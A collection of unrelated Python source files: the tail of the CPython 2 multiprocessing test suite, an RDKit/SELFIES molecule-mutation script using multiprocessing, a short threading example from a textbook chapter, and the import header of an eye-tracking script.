self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
        # call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction',
'multiprocessing.synchronize', 'multiprocessing.util'
]
if c_int is not None:
# This module requires _ctypes
modules.append('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
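# Example (editor's note, not in the upstream test file): with Mixin=ProcessesMixin
# and type='processes', a base class such as _TestLock defined above is wrapped into
# a new unittest case named 'WithProcessesTestLock' ('With' + 'Processes' + 'TestLock'),
# which inherits from (_TestLock, unittest.TestCase, ProcessesMixin).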
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _ThisSubProcess(q):
try:
item = q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,))
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
mutate_parr.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 31 12:15:57 2021
@author: akshat
"""
from __future__ import print_function
import rdkit
import random
import multiprocessing
from rdkit import Chem
from rdkit.Chem import MolFromSmiles as smi2mol
from rdkit.Chem import MolToSmiles as mol2smi
from selfies import encoder, decoder
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def get_selfie_chars(selfie):
'''Obtain a list of all selfie characters in string selfie
Parameters:
selfie (string) : A selfie string - representing a molecule
Example:
>>> get_selfie_chars('[C][=C][C][=C][C][=C][Ring1][Branch1_1]')
['[C]', '[=C]', '[C]', '[=C]', '[C]', '[=C]', '[Ring1]', '[Branch1_1]']
Returns
-------
chars_selfie (list of strings) :
list of selfie characters present in molecule selfie
'''
    chars_selfie = []  # A list of all SELFIE symbols from string selfie
while selfie != '':
chars_selfie.append(selfie[selfie.find('['): selfie.find(']')+1])
selfie = selfie[selfie.find(']')+1:]
return chars_selfie
def mutate_sf(sf_chars, alphabet):
'''
    Given a list of SELFIES characters, make a random change to the molecule using the
    provided alphabet. Operations on molecules are character replacements, additions and deletions.
Parameters
----------
    sf_chars : (list of str)
        List of SELFIE characters making up a SELFIE string.
alphabet : (list of SELFIE strings)
Replacements and addition operations are performed using this list of SELFIE strings.
Returns
-------
    Mutated SELFIE string.
'''
random_char_idx = random.choice(range(len(sf_chars)))
choices_ls = [1, 2, 3] # 1 = replacement; 2 = addition; 3=delete
mutn_choice = choices_ls[random.choice(range(len(choices_ls)))] # Which mutation to do:
    # Base SELFIES alphabet used for replacements/additions; a random sample
    # (at most 200 symbols) of the supplied alphabet is prepended when available.
    base_alphabet = ['[=N]', '[C]', '[S]', '[Branch3_1]', '[Expl=Ring3]', '[Branch1_1]', '[Branch2_2]', '[Ring1]', '[#P]', '[O]', '[Branch2_1]', '[N]', '[=O]', '[P]', '[Expl=Ring1]', '[Branch3_2]', '[I]', '[Expl=Ring2]', '[=P]', '[Branch1_3]', '[#C]', '[Cl]', '[=C]', '[=S]', '[Branch1_2]', '[#N]', '[Branch2_3]', '[Br]', '[Branch3_3]', '[Ring3]', '[Ring2]', '[F]']
    if alphabet != []:
        alphabet = random.sample(alphabet, min(200, len(alphabet))) + base_alphabet
    else:
        alphabet = base_alphabet
# Mutate character:
if mutn_choice == 1:
random_char = alphabet[random.choice(range(len(alphabet)))]
change_sf = sf_chars[0:random_char_idx] + [random_char] + sf_chars[random_char_idx+1: ]
# add character:
elif mutn_choice == 2:
random_char = alphabet[random.choice(range(len(alphabet)))]
change_sf = sf_chars[0:random_char_idx] + [random_char] + sf_chars[random_char_idx: ]
# delete character:
elif mutn_choice == 3:
if len(sf_chars) != 1:
change_sf = sf_chars[0:random_char_idx] + sf_chars[random_char_idx+1: ]
else:
change_sf = sf_chars
return ''.join(x for x in change_sf)
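# Example (editor's sketch, not part of the original script): one mutation pass
# over a benzene SELFIES.  The output is random, so only the call signature and
# return type are illustrated here.
#
#   >>> chars = get_selfie_chars('[C][=C][C][=C][C][=C][Ring1][Branch1_1]')
#   >>> mutate_sf(chars, alphabet=[])   # empty list -> built-in fallback alphabet
#   '[C][=C][C][=C][C][=C][Ring1][F]'   # one possible (random) result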
def get_prop_material(smile, alphabet, num_random_samples, num_mutations):
'''
    Given an input SMILES, perform mutations to the structure using the provided SELFIES
    alphabet list. 'num_random_samples' different randomized SMILES orderings are
    considered & a total of 'num_mutations' mutations are performed on each.
Parameters
----------
smile : (str)
Valid SMILES string.
alphabet : (list of str)
list of SELFIE strings.
    num_random_samples : (int)
        Number of different randomized SMILES orderings to generate for the input SMILES.
    num_mutations : (int)
        Number of mutations to perform on each of the different SMILES orderings.
Returns
-------
mutated_smiles_canon : (list of strings)
List of unique molecules produced from mutations.
'''
mol = Chem.MolFromSmiles(smile)
Chem.Kekulize(mol)
# Obtain randomized orderings of the SMILES:
randomized_smile_orderings = []
for _ in range(num_random_samples):
randomized_smile_orderings.append(rdkit.Chem.MolToSmiles(mol, canonical=False, doRandom=True, isomericSmiles=False, kekuleSmiles=True))
# Convert all the molecules to SELFIES
selfies_ls = [encoder(x) for x in randomized_smile_orderings]
selfies_ls_chars = [get_selfie_chars(selfie) for selfie in selfies_ls]
# Obtain the mutated selfies
mutated_sf = []
for sf_chars in selfies_ls_chars:
for i in range(num_mutations):
if i == 0: mutated_sf.append(mutate_sf(sf_chars, alphabet))
else: mutated_sf.append(mutate_sf ( get_selfie_chars(mutated_sf[-1]), alphabet ))
mutated_smiles = [decoder(x) for x in mutated_sf]
mutated_smiles_canon = []
for item in mutated_smiles:
try:
smi_canon = Chem.MolToSmiles(Chem.MolFromSmiles(item, sanitize=True), isomericSmiles=False, canonical=True)
if len(smi_canon) <= 81: # Size restriction!
mutated_smiles_canon.append(smi_canon)
        except Exception:  # skip SMILES that RDKit cannot parse or canonicalize
continue
mutated_smiles_canon = list(set(mutated_smiles_canon))
return mutated_smiles_canon
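# Example (editor's sketch): mutate a small molecule directly, without the
# multiprocessing wrapper.  With 2 randomized orderings and 3 mutations each,
# at most 6 candidate SMILES are produced; invalid or oversized ones are dropped
# and duplicates removed, so the returned list may be shorter.
#
#   >>> get_prop_material('CCO', alphabet=[], num_random_samples=2, num_mutations=3)
#   ['CCCO', 'CC(F)O', ...]   # illustrative only; actual output is random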
def sanitize_smiles(smi):
'''
Return a canonical smile representation of smi
Parameters
----------
smi : str
smile string to be canonicalized
Returns
-------
mol (rdkit.Chem.rdchem.Mol) :
RdKit mol object (None if invalid smile string smi)
smi_canon (string) :
Canonicalized smile representation of smi (None if invalid smile string smi)
conversion_successful (bool):
True/False to indicate if conversion was successful
'''
try:
mol = smi2mol(smi, sanitize=True)
smi_canon = mol2smi(mol, isomericSmiles=False, canonical=True)
return (mol, smi_canon, True)
    except Exception:
return (None, None, False)
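# Example (editor's sketch): sanitize_smiles never raises and always returns a
# 3-tuple, which makes it convenient for filtering candidate lists.
#
#   >>> sanitize_smiles('c1ccccc1')[1:]
#   ('c1ccccc1', True)
#   >>> sanitize_smiles('not a smiles')
#   (None, None, False)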
def get_chunks(arr, num_processors, ratio):
'''
    Split a list of SMILES into sublists, each of which will be operated on by a separate CPU.
Parameters
----------
    arr : (list of str)
        A list of SMILES.
    num_processors : (int)
        Number of CPUs available for conducting the operation.
    ratio : (float)
        Approximate number of SMILES to be handled by each CPU.
Returns
-------
chunks: (list of lists)
Each sublist is used by a different cpu to perform operations.
'''
    chunks = []  # Collect sublists that will be sent to different processors
counter = int(ratio)
for i in range(num_processors):
if i == 0:
chunks.append(arr[0:counter])
if i != 0 and i<num_processors-1:
chunks.append(arr[counter-int(ratio): counter])
if i == num_processors-1:
chunks.append(arr[counter-int(ratio): ])
counter += int(ratio)
return chunks
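# Example (editor's sketch): splitting 10 items across 3 processors with
# ratio = 10 / 3 (so int(ratio) == 3); the final chunk absorbs the remainder.
#
#   >>> get_chunks(list(range(10)), 3, 10 / 3)
#   [[0, 1, 2], [3, 4, 5], [6, 7, 8, 9]]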
def calc_parr_prop(unseen_smile_ls, property_name, props_collect, num_random_samples, num_mutations, alphabet):
    '''For each molecule in unseen_smile_ls, generate mutated SMILES via
    get_prop_material and record the results in the locked dictionary
    props_collect under the key property_name.
    '''
for smile in unseen_smile_ls:
props_collect[property_name][smile] = get_prop_material(smile, alphabet=alphabet, num_random_samples=num_random_samples, num_mutations=num_mutations) # TODO: TESTING
def create_parr_process(chunks, alphabet, property_name, num_random_samples, num_mutations):
'''
    Create parallel processes that generate mutated molecules for each sublist in chunks.
Parameters
----------
chunks : (list of list)
list of lists containing SMILES.
    property_name : (str)
        Name of the dictionary key under which results are stored (e.g. 'logP').
Returns
-------
combined_dict : (dict)
input smiles -> [List of mutated smiles].
'''
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_parr_prop, args=(item, property_name, props_collect, num_random_samples, num_mutations, alphabet, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def get_mutated_smiles(smiles, alphabet, space='Explore'):
num_processors = multiprocessing.cpu_count()
molecules_here_unique = list(set(smiles))
ratio = len(molecules_here_unique) / num_processors
chunks = get_chunks(molecules_here_unique, num_processors, ratio)
if space == 'Explore':
mut_smiles = create_parr_process(chunks, alphabet, 'logP', num_random_samples=5, num_mutations=5)
else:
mut_smiles = create_parr_process(chunks, alphabet, 'logP', num_random_samples=400, num_mutations=400)
return mut_smiles
if __name__ == '__main__':
molecules_here = ['CCC', 'CCCC', 'CCCCC', 'CCCCCCCC', 'CS', 'CSSS', 'CSSSSS', 'CF', 'CI', 'CBr', 'CSSSSSSSSSSSS', 'CSSSSSSSSSC', 'CSSSSCCSSSC', 'CSSSSSSSSSF', 'SSSSSC']
A = get_mutated_smiles(molecules_here, alphabet=['[C]']*500, space='Explore')
|
Chap10_Example10.13.py
|
from threading import *
from time import sleep
def display(num1,num2):
print(f"{current_thread().name} thread started")
sleep(1)
mul = num1 * num2
print(f"{current_thread().name} executing display function with value {mul}")
myt1 = Thread(target = display, name= "MyChildThread1",args = (10,20))
myt2 = Thread(target = display, name= "MyChildThread2",args = (30,40))
myt3 = Thread(target = display, name= "MyChildThread3",args = (50,60))
print("The total number of active threads before child thread start are: ", active_count())
myt1.start()
myt2.start()
myt3.start()
print(f"Is {myt1.name} alive: ",myt1.isAlive())
print(f"Is {myt2.name} alive: ",myt2.isAlive())
print(f"Is {myt3.name} alive: ",myt3.isAlive())
sleep(5)
print(f"Is {myt1.name} alive after MainThread sleep for 5 secs: ",myt1.isAlive())
print(f"Is {myt2.name} alive after MainThread sleep for 5 secs: ",myt2.isAlive())
print(f"Is {myt3.name} alive after MainThread sleep for 5 secs: ",myt3.isAlive())
|
gaze.py
|
#!/usr/bin/env python
import cv2
import os
import subprocess as sp
import sys
import numpy as np
import time
# import datetime
from matrix import get_pupil_transformation_matrix
from threading import Thread
sys.path.append(os.path.abspath('../../TEST'))
sys.path.append(os.path.abspath('../../TEST/shared_modules'))
from pupil_detectors import Detector_3D
from methods import Roi
sys.path.append(os.path.abspath('../'))
# from calibrateHaar import calibrate
# from pbcvt import findPupilEllipse
# from params import pupil_tracker_params
from cameras import cam0mat as cameraMatrix0
from cameras import cam0dcoef as distCoeffs0
from cameras import cam1mat as cameraMatrix1
